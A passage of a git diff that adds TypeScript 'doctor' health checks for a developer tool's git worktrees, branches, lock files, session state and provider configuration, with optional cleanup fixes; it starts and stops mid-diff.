b/src/resources/extensions/gsd/doctor-git-checks.ts @@ -0,0 +1,489 @@ +import { existsSync, readdirSync, realpathSync, rmSync, statSync } from "node:fs"; +import { join, sep } from "node:path"; + +import type { DoctorIssue, DoctorIssueCode } from "./doctor-types.js"; +import { loadFile } from "./files.js"; +import { parseRoadmap as parseLegacyRoadmap } from "./parsers-legacy.js"; +import { isDbAvailable, getMilestoneSlices } from "./gsd-db.js"; +import { resolveMilestoneFile } from "./paths.js"; +import { deriveState, isMilestoneComplete } from "./state.js"; +import { listWorktrees, resolveGitDir, worktreesDir } from "./worktree-manager.js"; +import { abortAndReset } from "./git-self-heal.js"; +import { RUNTIME_EXCLUSION_PATHS, resolveMilestoneIntegrationBranch, writeIntegrationBranch } from "./git-service.js"; +import { nativeIsRepo, nativeWorktreeList, nativeWorktreeRemove, nativeBranchList, nativeBranchDelete, nativeLsFiles, nativeRmCached, nativeHasChanges, nativeLastCommitEpoch, nativeGetCurrentBranch, nativeAddAllWithExclusions, nativeCommit } from "./native-git-bridge.js"; +import { getAllWorktreeHealth } from "./worktree-health.js"; +import { loadEffectiveGSDPreferences } from "./preferences.js"; + +/** + * Returns true if the directory contains only doctor artifacts + * (e.g. `.gsd/doctor-history.jsonl`). These dirs are created by + * appendDoctorHistory() writing to worktree-scoped paths during the audit + * and should not be flagged as orphaned worktrees (#3105). + */ +function isDoctorArtifactOnly(dirPath: string): boolean { + try { + const entries = readdirSync(dirPath); + // Empty dir — not a doctor artifact, still orphaned + if (entries.length === 0) return false; + // Only a .gsd subdirectory + if (entries.length === 1 && entries[0] === ".gsd") { + const gsdEntries = readdirSync(join(dirPath, ".gsd")); + return gsdEntries.length <= 1 && gsdEntries.every(e => e === "doctor-history.jsonl"); + } + return false; + } catch { + return false; + } +} + +export async function checkGitHealth( + basePath: string, + issues: DoctorIssue[], + fixesApplied: string[], + shouldFix: (code: DoctorIssueCode) => boolean, + isolationMode: "none" | "worktree" | "branch" = "none", +): Promise { + // Degrade gracefully if not a git repo + if (!nativeIsRepo(basePath)) { + return; // Not a git repo — skip all git health checks + } + + const gitDir = resolveGitDir(basePath); + + // ── Orphaned auto-worktrees & Stale milestone branches ──────────────── + // These checks only apply in worktree/branch modes — skip in none mode + // where no milestone worktrees or branches are created. + if (isolationMode !== "none") { + try { + const worktrees = listWorktrees(basePath); + const milestoneWorktrees = worktrees.filter(wt => wt.branch.startsWith("milestone/")); + + // Load roadmap state once for cross-referencing + const state = await deriveState(basePath); + + for (const wt of milestoneWorktrees) { + // Extract milestone ID from branch name "milestone/M001" → "M001" + const milestoneId = wt.branch.replace(/^milestone\//, ""); + const milestoneEntry = state.registry.find(m => m.id === milestoneId); + + // Check if milestone is complete via roadmap + let isComplete = false; + if (milestoneEntry) { + if (isDbAvailable()) { + const dbSlices = getMilestoneSlices(milestoneId); + isComplete = dbSlices.length > 0 && dbSlices.every(s => s.status === "complete"); + } else { + const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP"); + const roadmapContent = roadmapPath ? await loadFile(roadmapPath) : null; + if (roadmapContent) { + const roadmap = parseLegacyRoadmap(roadmapContent); + isComplete = isMilestoneComplete(roadmap); + } + } + // When DB unavailable and no roadmap, isComplete stays false + } + + if (isComplete) { + issues.push({ + severity: "warning", + code: "orphaned_auto_worktree", + scope: "milestone", + unitId: milestoneId, + message: `Worktree for completed milestone ${milestoneId} still exists at ${wt.path}`, + fixable: true, + }); + + if (shouldFix("orphaned_auto_worktree")) { + // If cwd is inside the worktree, chdir out first — matching the + // pattern in removeWorktree() (#1946). Without this, git cannot + // remove the worktree and the doctor enters a deadlock where it + // detects the orphan every run but never cleans it up. + const cwd = process.cwd(); + if (wt.path === cwd || cwd.startsWith(wt.path + sep)) { + try { + process.chdir(basePath); + } catch { + fixesApplied.push(`skipped removing worktree at ${wt.path} (cannot chdir to basePath)`); + continue; + } + } + try { + nativeWorktreeRemove(basePath, wt.path, true); + fixesApplied.push(`removed orphaned worktree ${wt.path}`); + } catch { + fixesApplied.push(`failed to remove worktree ${wt.path}`); + } + } + } + } + + // ── Stale milestone branches ───────────────────────────────────────── + try { + const branches = nativeBranchList(basePath, "milestone/*"); + if (branches.length > 0) { + const worktreeBranches = new Set(milestoneWorktrees.map(wt => wt.branch)); + + for (const branch of branches) { + // Skip branches that have a worktree (handled above) + if (worktreeBranches.has(branch)) continue; + + const milestoneId = branch.replace(/^milestone\//, ""); + const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP"); + let branchMilestoneComplete = false; + if (isDbAvailable()) { + const dbSlices = getMilestoneSlices(milestoneId); + branchMilestoneComplete = dbSlices.length > 0 && dbSlices.every(s => s.status === "complete"); + } else { + const roadmapContent = roadmapPath ? await loadFile(roadmapPath) : null; + if (!roadmapContent) continue; + const roadmap = parseLegacyRoadmap(roadmapContent); + branchMilestoneComplete = isMilestoneComplete(roadmap); + } + if (branchMilestoneComplete) { + issues.push({ + severity: "info", + code: "stale_milestone_branch", + scope: "milestone", + unitId: milestoneId, + message: `Branch ${branch} exists for completed milestone ${milestoneId}`, + fixable: true, + }); + + if (shouldFix("stale_milestone_branch")) { + try { + nativeBranchDelete(basePath, branch, true); + fixesApplied.push(`deleted stale branch ${branch}`); + } catch { + fixesApplied.push(`failed to delete branch ${branch}`); + } + } + } + } + } + } catch { + // git branch list failed — skip stale branch check + } + } catch { + // listWorktrees or deriveState failed — skip worktree/branch checks + } + } // end isolationMode !== "none" + + // ── Corrupt merge state ──────────────────────────────────────────────── + try { + const mergeStateFiles = ["MERGE_HEAD", "SQUASH_MSG"]; + const mergeStateDirs = ["rebase-apply", "rebase-merge"]; + const found: string[] = []; + + for (const f of mergeStateFiles) { + if (existsSync(join(gitDir, f))) found.push(f); + } + for (const d of mergeStateDirs) { + if (existsSync(join(gitDir, d))) found.push(d); + } + + if (found.length > 0) { + issues.push({ + severity: "error", + code: "corrupt_merge_state", + scope: "project", + unitId: "project", + message: `Corrupt merge/rebase state detected: ${found.join(", ")}`, + fixable: true, + }); + + if (shouldFix("corrupt_merge_state")) { + const result = abortAndReset(basePath); + fixesApplied.push(`cleaned merge state: ${result.cleaned.join(", ")}`); + } + } + } catch { + // Can't check .git dir — skip + } + + // ── Tracked runtime files ────────────────────────────────────────────── + try { + const trackedPaths: string[] = []; + for (const exclusion of RUNTIME_EXCLUSION_PATHS) { + try { + const files = nativeLsFiles(basePath, exclusion); + if (files.length > 0) { + trackedPaths.push(...files); + } + } catch { + // Individual ls-files can fail — continue + } + } + + if (trackedPaths.length > 0) { + issues.push({ + severity: "warning", + code: "tracked_runtime_files", + scope: "project", + unitId: "project", + message: `${trackedPaths.length} runtime file(s) are tracked by git: ${trackedPaths.slice(0, 5).join(", ")}${trackedPaths.length > 5 ? "..." : ""}`, + fixable: true, + }); + + if (shouldFix("tracked_runtime_files")) { + try { + for (const exclusion of RUNTIME_EXCLUSION_PATHS) { + nativeRmCached(basePath, [exclusion]); + } + fixesApplied.push(`untracked ${trackedPaths.length} runtime file(s)`); + } catch { + fixesApplied.push("failed to untrack runtime files"); + } + } + } + } catch { + // git ls-files failed — skip + } + + // ── Legacy slice branches ────────────────────────────────────────────── + try { + const branchList = nativeBranchList(basePath, "gsd/*/*") + .filter((branch) => !branch.startsWith("gsd/quick/")); + if (branchList.length > 0) { + issues.push({ + severity: "info", + code: "legacy_slice_branches", + scope: "project", + unitId: "project", + message: `${branchList.length} legacy slice branch(es) found: ${branchList.slice(0, 3).join(", ")}${branchList.length > 3 ? "..." : ""}. These are no longer used (branchless architecture).`, + fixable: true, + }); + + if (shouldFix("legacy_slice_branches")) { + let deleted = 0; + for (const branch of branchList) { + try { + nativeBranchDelete(basePath, branch, true); + deleted++; + } catch { /* skip branches that can't be deleted */ } + } + if (deleted > 0) { + fixesApplied.push(`deleted ${deleted} legacy slice branch(es)`); + } + } + } + } catch { + // git branch list failed — skip + } + + // ── Integration branch existence ────────────────────────────────────── + // For each active (non-complete) milestone, verify the stored integration + // branch still exists in git. A missing integration branch blocks merge-back + // and causes the next merge operation to fail silently. + try { + const state = await deriveState(basePath); + const gitPrefs = loadEffectiveGSDPreferences()?.preferences?.git ?? {}; + for (const milestone of state.registry) { + if (milestone.status === "complete") continue; + const resolution = resolveMilestoneIntegrationBranch(basePath, milestone.id, gitPrefs); + if (!resolution.recordedBranch) continue; // No stored branch — skip (not yet set) + if (resolution.status === "fallback" && resolution.effectiveBranch) { + issues.push({ + severity: "warning", + code: "integration_branch_missing", + scope: "milestone", + unitId: milestone.id, + message: resolution.reason, + fixable: true, + }); + if (shouldFix("integration_branch_missing")) { + writeIntegrationBranch(basePath, milestone.id, resolution.effectiveBranch); + fixesApplied.push(`updated integration branch for ${milestone.id} to "${resolution.effectiveBranch}"`); + } + continue; + } + + if (resolution.status === "missing") { + issues.push({ + severity: "error", + code: "integration_branch_missing", + scope: "milestone", + unitId: milestone.id, + message: resolution.reason, + fixable: false, + }); + } + } + } catch { + // Non-fatal — integration branch check failed + } + + // ── Orphaned worktree directories ──────────────────────────────────── + // Worktree removal can fail after a branch delete, leaving a directory + // that is no longer registered with git. These orphaned dirs cause + // "already exists" errors when re-creating the same worktree name. + try { + const wtDir = worktreesDir(basePath); + if (existsSync(wtDir)) { + // Resolve symlinks and normalize separators so that symlinked .gsd + // paths (e.g. ~/.gsd/projects//worktrees/…) match the paths + // returned by `git worktree list`. + const normalizePath = (p: string): string => { + try { p = realpathSync(p); } catch { /* path may not exist */ } + return p.replaceAll("\\", "/"); + }; + const registeredPaths = new Set( + nativeWorktreeList(basePath).map(entry => normalizePath(entry.path)), + ); + for (const entry of readdirSync(wtDir)) { + const fullPath = join(wtDir, entry); + try { + if (!statSync(fullPath).isDirectory()) continue; + } catch { continue; } + const normalizedFullPath = normalizePath(fullPath); + if (!registeredPaths.has(normalizedFullPath)) { + // Skip directories that only contain doctor artifacts (.gsd/doctor-history.jsonl). + // appendDoctorHistory() can recreate these dirs during the audit itself, + // causing a circular false positive (#3105 Bug 1). + if (isDoctorArtifactOnly(fullPath)) continue; + issues.push({ + severity: "warning", + code: "worktree_directory_orphaned", + scope: "project", + unitId: entry, + message: `Worktree directory ${fullPath} exists on disk but is not registered with git. Run "git worktree prune" or doctor --fix to remove it.`, + fixable: true, + }); + if (shouldFix("worktree_directory_orphaned")) { + try { + rmSync(fullPath, { recursive: true, force: true }); + fixesApplied.push(`removed orphaned worktree directory ${fullPath}`); + } catch { + fixesApplied.push(`failed to remove orphaned worktree directory ${fullPath}`); + } + } + } + } + } + } catch { + // Non-fatal — orphaned worktree directory check failed + } + + // ── Stale uncommitted changes ──────────────────────────────────────────── + // If the working tree has uncommitted changes and the last commit was + // longer ago than the configured threshold, flag it and optionally + // auto-commit a safety snapshot so work isn't lost. + try { + const prefs = loadEffectiveGSDPreferences()?.preferences ?? {}; + const thresholdMinutes = prefs.stale_commit_threshold_minutes ?? 30; + + if (thresholdMinutes > 0) { + const dirty = nativeHasChanges(basePath); + if (dirty) { + const branch = nativeGetCurrentBranch(basePath); + const lastEpoch = nativeLastCommitEpoch(basePath, branch || "HEAD"); + const nowEpoch = Math.floor(Date.now() / 1000); + const minutesSinceCommit = lastEpoch > 0 ? (nowEpoch - lastEpoch) / 60 : Infinity; + + if (minutesSinceCommit >= thresholdMinutes) { + const mins = Math.floor(minutesSinceCommit); + issues.push({ + severity: "warning", + code: "stale_uncommitted_changes", + scope: "project", + unitId: "project", + message: `Uncommitted changes detected with no commit in ${mins} minute${mins === 1 ? "" : "s"} (threshold: ${thresholdMinutes}m). Snapshotting uncommitted changes.`, + fixable: true, + }); + + if (shouldFix("stale_uncommitted_changes")) { + try { + nativeAddAllWithExclusions(basePath, RUNTIME_EXCLUSION_PATHS); + const commitMsg = `gsd snapshot: uncommitted changes after ${mins}m inactivity`; + const result = nativeCommit(basePath, commitMsg); + if (result) { + fixesApplied.push(`created gsd snapshot after ${mins}m of uncommitted changes`); + } else { + fixesApplied.push("gsd snapshot skipped — nothing to commit after staging changes"); + } + } catch { + fixesApplied.push("failed to create gsd snapshot commit"); + } + } + } + } + } + } catch { + // Non-fatal — stale commit check failed + } + + // ── Worktree lifecycle checks ────────────────────────────────────────── + // Check GSD-managed worktrees for: merged branches, stale work, dirty + // state, and unpushed commits. Only worktrees under .gsd/worktrees/. + try { + const healthStatuses = getAllWorktreeHealth(basePath); + const cwd = process.cwd(); + + for (const health of healthStatuses) { + const wt = health.worktree; + const isCwd = wt.path === cwd || cwd.startsWith(wt.path + sep); + + // Branch fully merged into main — safe to remove + if (health.mergedIntoMain) { + issues.push({ + severity: "info", + code: "worktree_branch_merged", + scope: "project", + unitId: wt.name, + message: `Worktree "${wt.name}" (branch ${wt.branch}) is fully merged into main${health.safeToRemove ? " — safe to remove" : ""}`, + fixable: health.safeToRemove, + }); + + if (health.safeToRemove && shouldFix("worktree_branch_merged") && !isCwd) { + try { + const { removeWorktree } = await import("./worktree-manager.js"); + removeWorktree(basePath, wt.name, { deleteBranch: true, branch: wt.branch }); + fixesApplied.push(`removed merged worktree "${wt.name}" and deleted branch ${wt.branch}`); + } catch { + fixesApplied.push(`failed to remove merged worktree "${wt.name}"`); + } + } + // If merged, skip the stale/dirty/unpushed checks — they're irrelevant + continue; + } + + // Stale: no commits in N days, not merged + if (health.stale) { + const days = Math.floor(health.lastCommitAgeDays); + issues.push({ + severity: "warning", + code: "worktree_stale", + scope: "project", + unitId: wt.name, + message: `Worktree "${wt.name}" has had no commits in ${days} day${days === 1 ? "" : "s"}`, + fixable: false, + }); + } + + // Dirty: uncommitted changes in a worktree (only flag on stale worktrees to avoid noise) + if (health.dirty && health.stale) { + issues.push({ + severity: "warning", + code: "worktree_dirty", + scope: "project", + unitId: wt.name, + message: `Worktree "${wt.name}" has ${health.dirtyFileCount} uncommitted file${health.dirtyFileCount === 1 ? "" : "s"} and is stale`, + fixable: false, + }); + } + + // Unpushed: commits not on any remote (only flag on stale worktrees to avoid noise) + if (health.unpushedCommits > 0 && health.stale) { + issues.push({ + severity: "warning", + code: "worktree_unpushed", + scope: "project", + unitId: wt.name, + message: `Worktree "${wt.name}" has ${health.unpushedCommits} unpushed commit${health.unpushedCommits === 1 ? "" : "s"}`, + fixable: false, + }); + } + } + } catch { + // Non-fatal — worktree lifecycle check failed + } +} diff --git a/src/resources/extensions/gsd/doctor-global-checks.ts b/src/resources/extensions/gsd/doctor-global-checks.ts new file mode 100644 index 000000000..cc181910a --- /dev/null +++ b/src/resources/extensions/gsd/doctor-global-checks.ts @@ -0,0 +1,84 @@ +import { existsSync, readdirSync, rmSync } from "node:fs"; +import { join } from "node:path"; + +import type { DoctorIssue, DoctorIssueCode } from "./doctor-types.js"; +import { readRepoMeta, externalProjectsRoot } from "./repo-identity.js"; + +/** + * Check for orphaned project state directories in ~/.gsd/projects/. + * + * A project directory is orphaned when its recorded gitRoot no longer exists + * on disk — the repo was deleted, moved, or the external drive was unmounted. + * These directories accumulate silently and waste disk space. + * + * Severity: info — orphaned state is harmless but takes disk space. + * Fixable: yes — rmSync the directory. Never auto-fixed at fixLevel="task". + */ +export async function checkGlobalHealth( + issues: DoctorIssue[], + fixesApplied: string[], + shouldFix: (code: DoctorIssueCode) => boolean, +): Promise { + try { + const projectsDir = externalProjectsRoot(); + + if (!existsSync(projectsDir)) return; + + let entries: string[]; + try { + entries = readdirSync(projectsDir, { withFileTypes: true }) + .filter(e => e.isDirectory()) + .map(e => e.name); + } catch { + return; // Can't read directory — skip + } + + if (entries.length === 0) return; + + const orphaned: Array<{ hash: string; gitRoot: string; remoteUrl: string }> = []; + let unknownCount = 0; + + for (const hash of entries) { + const dirPath = join(projectsDir, hash); + const meta = readRepoMeta(dirPath); + if (!meta) { + unknownCount++; + continue; + } + if (!existsSync(meta.gitRoot)) { + orphaned.push({ hash, gitRoot: meta.gitRoot, remoteUrl: meta.remoteUrl }); + } + } + + if (orphaned.length === 0) return; + + const labels = orphaned.slice(0, 3).map(o => o.gitRoot).join(", "); + const overflow = orphaned.length > 3 ? ` (+${orphaned.length - 3} more)` : ""; + const unknownNote = unknownCount > 0 ? ` — ${unknownCount} additional director${unknownCount === 1 ? "y" : "ies"} have no metadata yet (open those repos once to register them)` : ""; + + issues.push({ + severity: "info", + code: "orphaned_project_state", + scope: "project", + unitId: "global", + message: `${orphaned.length} orphaned GSD project state director${orphaned.length === 1 ? "y" : "ies"} in ${projectsDir} whose git root no longer exists: ${labels}${overflow}${unknownNote}. Run /gsd cleanup projects to audit or /gsd cleanup projects --fix to reclaim disk space.`, + file: projectsDir, + fixable: true, + }); + + if (shouldFix("orphaned_project_state")) { + let removed = 0; + for (const { hash } of orphaned) { + try { + rmSync(join(projectsDir, hash), { recursive: true, force: true }); + removed++; + } catch { + // Individual removal failure is non-fatal — continue with remaining + } + } + fixesApplied.push(`removed ${removed} orphaned project state director${removed === 1 ? "y" : "ies"} from ${projectsDir}`); + } + } catch { + // Non-fatal — global health check must not block per-project doctor + } +} diff --git a/src/resources/extensions/gsd/doctor-proactive.ts b/src/resources/extensions/gsd/doctor-proactive.ts index 0eb3b016f..20beae148 100644 --- a/src/resources/extensions/gsd/doctor-proactive.ts +++ b/src/resources/extensions/gsd/doctor-proactive.ts @@ -21,8 +21,8 @@ import { readCrashLock, isLockProcessAlive, clearLock } from "./crash-recovery.j import { abortAndReset } from "./git-self-heal.js"; import { rebuildState } from "./doctor.js"; import { deriveState } from "./state.js"; -import { resolveMilestoneIntegrationBranch } from "./git-service.js"; -import { nativeIsRepo } from "./native-git-bridge.js"; +import { RUNTIME_EXCLUSION_PATHS, resolveMilestoneIntegrationBranch } from "./git-service.js"; +import { nativeIsRepo, nativeHasChanges, nativeLastCommitEpoch, nativeGetCurrentBranch, nativeAddAllWithExclusions, nativeCommit } from "./native-git-bridge.js"; import { loadEffectiveGSDPreferences } from "./preferences.js"; import { runEnvironmentChecks } from "./doctor-environment.js"; @@ -295,6 +295,40 @@ export async function preDispatchHealthGate(basePath: string): Promise 0 && nativeHasChanges(basePath)) { + const branch = nativeGetCurrentBranch(basePath); + const lastEpoch = nativeLastCommitEpoch(basePath, branch || "HEAD"); + const nowEpoch = Math.floor(Date.now() / 1000); + const minutesSinceCommit = lastEpoch > 0 ? (nowEpoch - lastEpoch) / 60 : Infinity; + + if (minutesSinceCommit >= thresholdMinutes) { + const mins = Math.floor(minutesSinceCommit); + try { + nativeAddAllWithExclusions(basePath, RUNTIME_EXCLUSION_PATHS); + const commitMsg = `gsd snapshot: pre-dispatch, uncommitted changes after ${mins}m inactivity`; + const result = nativeCommit(basePath, commitMsg); + if (result) { + fixesApplied.push(`pre-dispatch: created gsd snapshot after ${mins}m of uncommitted changes`); + } + } catch { + // Non-blocking — snapshot failed but dispatch can continue + fixesApplied.push("pre-dispatch: gsd snapshot failed"); + } + } + } + } + } catch { + // Non-fatal + } + // ── Disk space check ── // Catches low-disk conditions before dispatch rather than letting the unit // fail mid-execution with ENOSPC (which wastes a full LLM turn). diff --git a/src/resources/extensions/gsd/doctor-providers.ts b/src/resources/extensions/gsd/doctor-providers.ts index a06a5c307..e0f35341b 100644 --- a/src/resources/extensions/gsd/doctor-providers.ts +++ b/src/resources/extensions/gsd/doctor-providers.ts @@ -181,7 +181,8 @@ function resolveKey(providerId: string): KeyLookup { */ const PROVIDER_ROUTES: Record = { anthropic: ["github-copilot"], - openai: ["github-copilot"], + openai: ["github-copilot", "openai-codex"], + google: ["google-gemini-cli"], }; function checkLlmProviders(): ProviderCheckResult[] { @@ -305,11 +306,24 @@ function checkOptionalProviders(): ProviderCheckResult[] { const optional = ["brave", "tavily", "jina", "context7"] as const; const results: ProviderCheckResult[] = []; + // Determine which search providers are configured so we can suppress + // "not configured" noise for alternative search providers when at least + // one is already active (e.g. don't warn about missing BRAVE_API_KEY + // when Tavily is configured). + const searchProviderIds = ["brave", "tavily"] as const; + const hasAnySearchProvider = searchProviderIds.some(id => resolveKey(id).found); + for (const providerId of optional) { const info = PROVIDER_REGISTRY.find(p => p.id === providerId); if (!info) continue; const lookup = resolveKey(providerId); + + // Skip unconfigured search providers when another search provider is active + if (!lookup.found && hasAnySearchProvider && info.category === "search") { + continue; + } + results.push({ name: providerId, label: info.label, diff --git a/src/resources/extensions/gsd/doctor-runtime-checks.ts b/src/resources/extensions/gsd/doctor-runtime-checks.ts new file mode 100644 index 000000000..d2af2bd9a --- /dev/null +++ b/src/resources/extensions/gsd/doctor-runtime-checks.ts @@ -0,0 +1,627 @@ +import { existsSync, lstatSync, readdirSync, readFileSync, realpathSync, rmSync, statSync } from "node:fs"; +import { basename, dirname, join } from "node:path"; + +import type { DoctorIssue, DoctorIssueCode } from "./doctor-types.js"; +import { cleanNumberedGsdVariants } from "./repo-identity.js"; +import { milestonesDir, gsdRoot, resolveGsdRootFile } from "./paths.js"; +import { deriveState } from "./state.js"; +import { saveFile } from "./files.js"; +import { nativeIsRepo, nativeForEachRef, nativeUpdateRef } from "./native-git-bridge.js"; +import { readCrashLock, isLockProcessAlive, clearLock } from "./crash-recovery.js"; +import { ensureGitignore } from "./gitignore.js"; +import { readAllSessionStatuses, isSessionStale, removeSessionStatus } from "./session-status-io.js"; +import { recoverFailedMigration } from "./migrate-external.js"; + +export async function checkRuntimeHealth( + basePath: string, + issues: DoctorIssue[], + fixesApplied: string[], + shouldFix: (code: DoctorIssueCode) => boolean, +): Promise { + const root = gsdRoot(basePath); + + // ── Stale crash lock ────────────────────────────────────────────────── + try { + const lock = readCrashLock(basePath); + if (lock) { + const alive = isLockProcessAlive(lock); + if (!alive) { + issues.push({ + severity: "error", + code: "stale_crash_lock", + scope: "project", + unitId: "project", + message: `Stale auto.lock from PID ${lock.pid} (started ${lock.startedAt}, was executing ${lock.unitType} ${lock.unitId}) — process is no longer running`, + file: ".gsd/auto.lock", + fixable: true, + }); + + if (shouldFix("stale_crash_lock")) { + clearLock(basePath); + fixesApplied.push("cleared stale auto.lock"); + } + } + } + } catch { + // Non-fatal — crash lock check failed + } + + // ── Stranded lock directory ──────────────────────────────────────────── + // proper-lockfile creates a `.gsd.lock/` directory as the OS-level lock + // mechanism. If the process was SIGKILLed or crashed hard, this directory + // can remain on disk without any live process holding it. The next session + // fails to acquire the lock until the directory is removed (#1245). + try { + const lockDir = join(dirname(root), `${basename(root)}.lock`); + if (existsSync(lockDir)) { + const statRes = statSync(lockDir); + if (statRes.isDirectory()) { + // Check if any live process actually holds this lock + const lock = readCrashLock(basePath); + const lockHolderAlive = lock ? isLockProcessAlive(lock) : false; + if (!lockHolderAlive) { + issues.push({ + severity: "error", + code: "stranded_lock_directory", + scope: "project", + unitId: "project", + message: `Stranded lock directory "${lockDir}" exists but no live process holds the session lock. This blocks new auto-mode sessions from starting.`, + file: lockDir, + fixable: true, + }); + if (shouldFix("stranded_lock_directory")) { + try { + rmSync(lockDir, { recursive: true, force: true }); + fixesApplied.push(`removed stranded lock directory ${lockDir}`); + } catch { + fixesApplied.push(`failed to remove stranded lock directory ${lockDir}`); + } + } + } + } + } + } catch { + // Non-fatal — stranded lock directory check failed + } + + // ── Stale parallel sessions ──────────────────────────────────────────── + try { + const parallelStatuses = readAllSessionStatuses(basePath); + for (const status of parallelStatuses) { + if (isSessionStale(status)) { + issues.push({ + severity: "warning", + code: "stale_parallel_session", + scope: "project", + unitId: status.milestoneId, + message: `Stale parallel session for ${status.milestoneId} (PID ${status.pid}, started ${new Date(status.startedAt).toISOString()}, last heartbeat ${new Date(status.lastHeartbeat).toISOString()}) — process is no longer running`, + file: `.gsd/parallel/${status.milestoneId}.status.json`, + fixable: true, + }); + + if (shouldFix("stale_parallel_session")) { + removeSessionStatus(basePath, status.milestoneId); + fixesApplied.push(`cleaned up stale parallel session for ${status.milestoneId}`); + } + } + } + } catch { + // Non-fatal — parallel session check failed + } + + // ── Orphaned completed-units keys ───────────────────────────────────── + try { + const completedKeysFile = join(root, "completed-units.json"); + if (existsSync(completedKeysFile)) { + const raw = readFileSync(completedKeysFile, "utf-8"); + const keys: string[] = JSON.parse(raw); + const orphaned: string[] = []; + + for (const key of keys) { + // Key format: "unitType/unitId" e.g. "execute-task/M001/S01/T01" + // Hook units have compound types: "hook//unitId" + const { splitCompletedKey } = await import("./forensics.js"); + const parsed = splitCompletedKey(key); + if (!parsed) continue; + const { unitType, unitId } = parsed; + + // Only validate artifact-producing unit types + const { verifyExpectedArtifact } = await import("./auto-recovery.js"); + if (!verifyExpectedArtifact(unitType, unitId, basePath)) { + orphaned.push(key); + } + } + + if (orphaned.length > 0) { + issues.push({ + severity: "warning", + code: "orphaned_completed_units", + scope: "project", + unitId: "project", + message: `${orphaned.length} completed-unit key(s) reference missing artifacts: ${orphaned.slice(0, 3).join(", ")}${orphaned.length > 3 ? "..." : ""}`, + file: ".gsd/completed-units.json", + fixable: true, + }); + + if (shouldFix("orphaned_completed_units")) { + const orphanedSet = new Set(orphaned); + const remaining = keys.filter((key) => !orphanedSet.has(key)); + await saveFile(completedKeysFile, JSON.stringify(remaining)); + fixesApplied.push(`removed ${orphaned.length} orphaned completed-unit key(s)`); + } + } + } + } catch { + // Non-fatal — completed-units check failed + } + + // ── Stale hook state ────────────────────────────────────────────────── + try { + const hookStateFile = join(root, "hook-state.json"); + if (existsSync(hookStateFile)) { + const raw = readFileSync(hookStateFile, "utf-8"); + const state = JSON.parse(raw); + const hasCycleCounts = state.cycleCounts && typeof state.cycleCounts === "object" + && Object.keys(state.cycleCounts).length > 0; + + // Only flag if there are actual cycle counts AND no auto-mode is running + if (hasCycleCounts) { + const lock = readCrashLock(basePath); + const autoRunning = lock ? isLockProcessAlive(lock) : false; + + if (!autoRunning) { + issues.push({ + severity: "info", + code: "stale_hook_state", + scope: "project", + unitId: "project", + message: `hook-state.json has ${Object.keys(state.cycleCounts).length} residual cycle count(s) from a previous session`, + file: ".gsd/hook-state.json", + fixable: true, + }); + + if (shouldFix("stale_hook_state")) { + const { clearPersistedHookState } = await import("./post-unit-hooks.js"); + clearPersistedHookState(basePath); + fixesApplied.push("cleared stale hook-state.json"); + } + } + } + } + } catch { + // Non-fatal — hook state check failed + } + + // ── Activity log bloat ──────────────────────────────────────────────── + try { + const activityDir = join(root, "activity"); + if (existsSync(activityDir)) { + const files = readdirSync(activityDir); + let totalSize = 0; + for (const f of files) { + try { + totalSize += statSync(join(activityDir, f)).size; + } catch { + // stat failed — skip + } + } + + const totalMB = totalSize / (1024 * 1024); + const BLOAT_FILE_THRESHOLD = 500; + const BLOAT_SIZE_MB = 100; + + if (files.length > BLOAT_FILE_THRESHOLD || totalMB > BLOAT_SIZE_MB) { + issues.push({ + severity: "warning", + code: "activity_log_bloat", + scope: "project", + unitId: "project", + message: `Activity logs: ${files.length} files, ${totalMB.toFixed(1)}MB (thresholds: ${BLOAT_FILE_THRESHOLD} files / ${BLOAT_SIZE_MB}MB)`, + file: ".gsd/activity/", + fixable: true, + }); + + if (shouldFix("activity_log_bloat")) { + const { pruneActivityLogs } = await import("./activity-log.js"); + pruneActivityLogs(activityDir, 7); // 7-day retention + fixesApplied.push("pruned activity logs (7-day retention)"); + } + } + } + } catch { + // Non-fatal — activity log check failed + } + + // ── STATE.md health ─────────────────────────────────────────────────── + try { + const stateFilePath = resolveGsdRootFile(basePath, "STATE"); + const milestonesPath = milestonesDir(basePath); + + if (existsSync(milestonesPath)) { + if (!existsSync(stateFilePath)) { + issues.push({ + severity: "warning", + code: "state_file_missing", + scope: "project", + unitId: "project", + message: "STATE.md is missing — state display will not work", + file: ".gsd/STATE.md", + fixable: true, + }); + + if (shouldFix("state_file_missing")) { + const state = await deriveState(basePath); + await saveFile(stateFilePath, buildStateMarkdownForCheck(state)); + fixesApplied.push("created STATE.md from derived state"); + } + } else { + // Check if STATE.md is stale by comparing active milestone/slice/phase + const currentContent = readFileSync(stateFilePath, "utf-8"); + const state = await deriveState(basePath); + const freshContent = buildStateMarkdownForCheck(state); + + // Extract key fields for comparison — don't compare full content + // since timestamp/formatting differences are normal + const extractFields = (content: string) => { + const milestone = content.match(/\*\*Active Milestone:\*\*\s*(.+)/)?.[1]?.trim() ?? ""; + const slice = content.match(/\*\*Active Slice:\*\*\s*(.+)/)?.[1]?.trim() ?? ""; + const phase = content.match(/\*\*Phase:\*\*\s*(.+)/)?.[1]?.trim() ?? ""; + return { milestone, slice, phase }; + }; + + const current = extractFields(currentContent); + const fresh = extractFields(freshContent); + + if (current.milestone !== fresh.milestone || current.slice !== fresh.slice || current.phase !== fresh.phase) { + issues.push({ + severity: "warning", + code: "state_file_stale", + scope: "project", + unitId: "project", + message: `STATE.md is stale — shows "${current.phase}" but derived state is "${fresh.phase}"`, + file: ".gsd/STATE.md", + fixable: true, + }); + + if (shouldFix("state_file_stale")) { + await saveFile(stateFilePath, freshContent); + fixesApplied.push("rebuilt STATE.md from derived state"); + } + } + } + } + } catch { + // Non-fatal — STATE.md check failed + } + + // ── Gitignore drift ─────────────────────────────────────────────────── + try { + const gitignorePath = join(basePath, ".gitignore"); + if (existsSync(gitignorePath) && nativeIsRepo(basePath)) { + const content = readFileSync(gitignorePath, "utf-8"); + const existingLines = new Set( + content.split("\n").map(l => l.trim()).filter(l => l && !l.startsWith("#")), + ); + + // Check for critical runtime patterns that must be present + const criticalPatterns = [ + ".gsd/activity/", + ".gsd/runtime/", + ".gsd/auto.lock", + ".gsd/gsd.db", + ".gsd/completed-units.json", + ]; + + // If blanket .gsd/ or .gsd is present, all patterns are covered + const hasBlanketIgnore = existingLines.has(".gsd/") || existingLines.has(".gsd"); + + if (!hasBlanketIgnore) { + const missing = criticalPatterns.filter(p => !existingLines.has(p)); + if (missing.length > 0) { + issues.push({ + severity: "warning", + code: "gitignore_missing_patterns", + scope: "project", + 